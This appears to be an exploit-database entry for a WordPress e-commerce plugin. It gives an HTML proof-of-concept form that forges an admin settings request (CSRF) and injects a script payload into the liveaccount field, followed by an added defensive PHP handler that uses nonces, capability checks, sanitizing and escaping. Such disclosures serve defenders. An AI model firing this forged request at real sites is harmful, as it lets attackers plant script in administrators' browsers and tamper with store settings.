## https://sploitus.com/exploit?id=WPEX-ID:4127B76C-4E4B-483B-8905-B5CA6D24337D
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp-ecommerce-settings" method="POST">
      <input type="hidden" name="language" value="3" />
      <input type="hidden" name="currency" value="25" />
      <input type="hidden" name="liveaccount" value="'><script>alert(/XSS/)</script>" />
      <input type="hidden" name="sandboxaccount" value="">" />
      <input type="hidden" name="mode" value="2" />
      <input type="hidden" name="paymentaction" value="1" />
      <input type="hidden" name="size" value="2" />
      <input type="hidden" name="opens" value="2" />
      <input type="hidden" name="cancel" value="">" />
      <input type="hidden" name="return" value="">" />
      <input type="hidden" name="update" value="" />
      <input type="hidden" name="btn2" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

All parameters are affected, such as sandboxaccount, etc.
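
A settings handler hardened against the two things the form above depends on (it carries no nonce field, and its payload is written to break out of an attribute value), as an added example that is not the plugin's own code. The `wpec_*` function names, the nonce action and field, and the `wpec_settings` option are hypothetical; the field names come from the form, and the integer/text split is assumed from the values it submits.

```php
<?php
// Added example: hypothetical handler, not the plugin's code.
// Assumed names: wpec_* functions, 'wpec_save_settings' nonce action,
// 'wpec_nonce' field, 'wpec_settings' option.

const WPEC_INT_FIELDS  = array( 'language', 'currency', 'mode', 'paymentaction', 'size', 'opens' );
const WPEC_TEXT_FIELDS = array( 'liveaccount', 'sandboxaccount', 'cancel', 'return' );

function wpec_save_settings() {
    if ( ! isset( $_POST['btn2'] ) ) {
        return; // Not a settings submission.
    }
    // Only administrators may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // A form hosted on another origin cannot supply a valid nonce, so it stops here.
    check_admin_referer( 'wpec_save_settings', 'wpec_nonce' );

    $settings = array();
    foreach ( WPEC_INT_FIELDS as $field ) {
        $settings[ $field ] = isset( $_POST[ $field ] ) ? absint( $_POST[ $field ] ) : 0;
    }
    foreach ( WPEC_TEXT_FIELDS as $field ) {
        $raw = isset( $_POST[ $field ] ) ? wp_unslash( $_POST[ $field ] ) : '';
        // Strip tags on input; arrays and other non-strings are discarded.
        $settings[ $field ] = is_string( $raw ) ? sanitize_text_field( $raw ) : '';
    }
    update_option( 'wpec_settings', $settings );
}
add_action( 'admin_init', 'wpec_save_settings' );

function wpec_render_settings_form() {
    $settings = get_option( 'wpec_settings', array() );
    echo '<form method="post">';
    wp_nonce_field( 'wpec_save_settings', 'wpec_nonce' );
    foreach ( WPEC_TEXT_FIELDS as $field ) {
        $value = isset( $settings[ $field ] ) ? $settings[ $field ] : '';
        // esc_attr() encodes quotes and angle brackets, so a stored value
        // cannot close the attribute or open a new element.
        printf(
            '<input type="text" name="%1$s" value="%2$s" />',
            esc_attr( $field ),
            esc_attr( $value )
        );
    }
    echo '<input type="submit" name="btn2" value="Save Settings" />';
    echo '</form>';
}
```

Escaping on output is the control that matters for values already stored before a fix is deployed; sanitizing on input alone leaves earlier payloads in the database.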